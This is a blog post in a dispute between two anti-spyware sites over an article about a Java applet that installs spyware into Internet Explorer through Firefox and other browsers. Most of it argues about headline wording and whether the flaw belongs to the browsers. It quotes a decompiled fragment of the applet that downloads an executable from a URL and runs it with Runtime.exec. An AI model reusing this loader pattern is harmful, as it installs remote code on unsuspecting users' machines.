Categories
Spywareinfo slander Vitalsecurity..?
Its not often that a security site "attacks" another security site. However, another member site of ASAP (Spywareinfo) has taken it upon themselves to run our name through the mud in their newsletter. Instead of approaching us directly about something they may not have "got", they decided to stick the boot in through their newsletter which goes out to thousands of registered subscribers. The issue is (of course) the story regarding the Applet that bypasses whatever browser you happen to be using at the time, to infect IE (as long as the user is silly enough to click "yes").
For some reason, Mike Healan chose to crack off his wonderful missive without bothering to contact me directly first. Because of this, I will now have anything up to 17,000 people coming here and either
a) Hurling reams of abuse at me without actually reading anything, or
b) Reading the article and wondering why Spywareinfo.com is calling my site "libelous". There's already a number of confused posters over at their forum, and the confusion is only likely to increase. So in the spirit of goodwill, I reproduce here Vitalsecurity.org's response to their March newsletter.
Spywareinfo - My frustration with this is that people are calling it a problem with Firefox. That is patently untrue. Every single browser is going to pop up a similar warning when it encounters this particular Java applet. If this had been labeled a problem with all web browsers, it still would be untrue, but at least it would not slander a particular browser. The people publishing this libelous nonsense should be ashamed of themselves and should print a prominent correction.
Libelous nonsense?
Presumably you mean me?
You must do, because you don't provide any other links in your newsletter. I dont know whether people are reading the wrong article here, but at all points in my piece I state quite clearly that the problem is caused by Java. I also point out that after testing, the Java applet works with most browsers out there. However, I give an example of what that java applet does whilst using Firefox to illustrate the point that no browser is safe when a user agrees to something they shouldn't.
I'd also like to point out that, with Opera at least, the applet does not appear when running the newest version of Java. And when running an older version , its appearance is sporadic to say the least. See the Opera forums for more info.
Spywareinfo - This is not a problem with Firefox or with any other web browser.
In my opinion, this is a total cop out. Mozilla have now taken this problem on as a browser issue - they're now looking to "whitelist" java applets in the same way software installs come updates.mozilla.org. So if a browser vendor is seeing this as a browser issue and then attempting to fix it in tandem with Sun (which they are), then both our opinions of whether this is or isn't a browser issue don't really matter after that point.
The truly sad part is that none of the other affected browsers are following suit.
But if its theoretically possible to fix a problem in a browser, then its a browser issue, however you dress it up.
Spywareinfo - And to be honest, you'd have to be pretty dense to click "Yes" to such a prompt arriving out of nowhere.
That's a rather odd line for an antispyware site to take - pretending that many spyware installs dont occur as a result of user interaction! I can't believe that a "support forum" that wants to help people who do just that then goes and effectively calls them "dense". Why don't you just break the other golden rule of HJT forums and call them stupid for looking at porn sites too!
Spywareinfo - What is truly sad here is that the news sites I mentioned earlier are portraying this as a spyware targeting and infecting the Firefox web browser.
That last point is interesting - nowhere on the article does it state that Firefox is infected by anything.
From my site..
What if that same infection could get past not only FF (to infect IE), but a whole raft of other (supposedly more secure) browsers too?
From my site..
Firefox 1.0.1 - The install works.
Mozilla - The install works.
Avant browser 10.0 (build 153) - The install works.
Netscape 7.2 - The damn thing kept crashing, but eventually I was able to discover that the install works.
NetCaptor 7.5.4 - The install is blocked.
Opera 7.5.4 - The install is blocked.
In case you hadn't guessed by this point, the above is a list of browsers that will be bypassed when in use to infect IE if the user agees to the install. And it turns out Opera comes out best of the bunch.
From my site...
So how is this happening? The developers of this install are using the Java Runtime Environment, the initial installer taking the form of a Java applet rather than an Active X component inherent to IE alone. In this way, if the browser being used can recognise and install the applet (to infect IE), then it doesn't seem to matter what browser you're using, or (more worryingly) how tight your IE security is.
In addition, the Register article is called "Alternative browser spyware infects IE".
The Register - Some useful citizen has created an installer that will nail IE with spyware, even if a surfer is using Firefox (or another alternative browser) or has blocked access to the malicious site in IE beforehand.
Hardly accusing Firefox of exclusive spyware, or even that the Spyware infects Firefox itself!
And in case you missed this bit, a direct quote from me. If you can spot the exact place where I exclusively blame firefox you win a coconut:
Me - "The spyware installer is a Java applet powered by the Sun Java Runtime Environment, which allows them to whack most browsers out there (to infect IE), including Firefox, Mozilla, Netscape and others".
Finally, a direct quote from a visitor to my site regarding the Java sandbox:
// begin exploit
private void jbInit()
throws Exception
{
File file = File.createTempFile(app, ".exe");
ByteArrayOutputStream bytearrayoutputstream = downloadFile(url);
if(bytearrayoutputstream == null)
throw new IOException("downloading was failed");
String s = saveFile(bytearrayoutputstream, file);
bytearrayoutputstream.close();
String s1 = "";
if(account_id != null && account_id.length() > 0)
s1 = s1 + " /aid:" + account_id;
if(download_key != null && download_key.length() > 0)
s1 = s1 + " /key:" + download_key;
if(download_lock != null && download_lock.length() > 0)
s1 = s1 + " /lock:" + download_lock;
if(cfg != null && cfg.length() > 0)
s1 = s1 + " /cfg:" + cfg;
if(sub != null && sub.length() > 0)
s1 = s1 + " /sub:" + sub;
Runtime.getRuntime().exec(file.getAbsolutePath() + s1);
}
// end exploit
the problem is that Runtime.exec() shouldn't even work from within the browser framework, dialog warnings or not. there is no SANDBOX when you allow this. most people aren't aware that Java can do this.
In effect, the whole notion of a Sandbox goes out the window in any case.
My article quite clearly states that all of these browsers are bypassed when in use by the Java applet to nail IE.
So does The Register.
Some key points to summarise:
1) theres a "?" at the end of the title rather than a "!" or anything similar so it (should be!) obvious that theres more to it than just firefox. Its a hook to guide the user in, play with their expectations and then reveal the true issue at hand. That's been quite a common tactic for some time - give a hoot and read a book, or check out a Hitchcock movie. You'll soon learn to get your head around such usage of the English language. If nothing else, the title quite reasonably explains that you can get IE infected whilst using another browser - in this case Firefox. To actually find out how, you have to read the article.
And on a final note regarding "sensationalism" - consider the following.
Try to summarise in a handful of words how youre going to describe a rather multi-levelled cross browser exploit that depends on a number of different factors that all come together to nail IE. You need to keep it brief, give a hint of what is to come or be discussed (WITHOUT getting technical, as headlines like that simply make people read something else very quickly). You also need to try and get the connection in peoples minds that the "safest browser ever" (at least in the publics mind) can be exploited (along with the users trust) to install malware, both in IE and on the operating system (without IE actually being in use at the time).
Now, I've just had to use up a sizeable chunk of words in order to give a vaguely detailed, yet efficient summary of the main focus of the piece - that using FF will not neccesarily prevent you falling into harms way.
And what is my title?
"Firefox spyware infects IE?"
If someone cant immediately see that a question is being posed - note the question mark! - that immediately makes the connection between firefox, spyware and the nailing of IE then i despair, i really do.
If the headline had had about five "!!!!!" at the end, then fair enough.
Now - consider the following headline and sample...
"Epidemic Of Firefox Spyware Infecting Computers Worldwide!"
"What is truly sad here is that the news sites I mentioned earlier are portraying this as a spyware targeting and infecting the Firefox web browser. These news sites are doing a grave disservice to their readers by misleading them."
I have repeatedly asked everyone who has seen that statement to find one place - one instance where I said that Firefox was infected with anything. It simply does not exist.
In addition, suggesting that there is a potential vector for attack in Firefox because of the way it allows an applet to function is not "libellous", as was stated - and to suggest so is attempting to shout down any criticism of a flaw that's been spotted, which does not help a browser vendor fix a problem.
2) firefox is the security fanboy's darling browser - and I used FF to demonstrate the install. I also use it as my main browser, so theres a personal element to the story - much like the newsletter has a personal element, from the disclaimer below:
The contents of this newsletter is commentary. It should not be mistaken for unbiased, objective journalism.
Maybe some unbiased, objective journalism of my commentary would have been useful before sending that newsletter out...? Seems strange someone else can put their own slant on an issue but I am seemingly lambasted for doing so. The playing field seems rather uneven at this point.
3) In a weird self-fulfilling way, Mozilla have confirmed that (for them) its a browser issue that they're exploring with a means to fixing, if at all possible - so I'm actually 100% bang on. Add to that it doesnt work on Opera with up to date Java installed and its NOT a browser wide problem, apparently. This has been explored in depth on the Opera forums.
4) A direct link has now been found to Firefox-specific .XPI files that attempt tp load toolbars into IE. See here for more details. That last one kind of buries the argument once and for all, doesn't it?
How many people knew of this cross browser java install BEFORE I posted my article?
A handful of people on Tomcoyote.org, which is where it would have stayed.
How many people now know?
Thousands and thousands.
And of those people, a large amount who might have actually clicked "yes" to the install will now hopefully avoid doing so.
Believe me when I say, from where I'm standing, the only place hurling "libelous" comments appears to be Spywareinfo - and whilst I couldn't care less about personal attacks, you've taken a vast swing at the name of this site and everything it stands for.
The dictionary definition of "Libellous" is as follows:
"(used of statements) harmful and often untrue; tending to discredit or malign"
Thankfully, whilst my article title poses a question, you make a very definite statement, and a malignant one at that.
I think the site that needs to publish a correction is Spywareinfo.
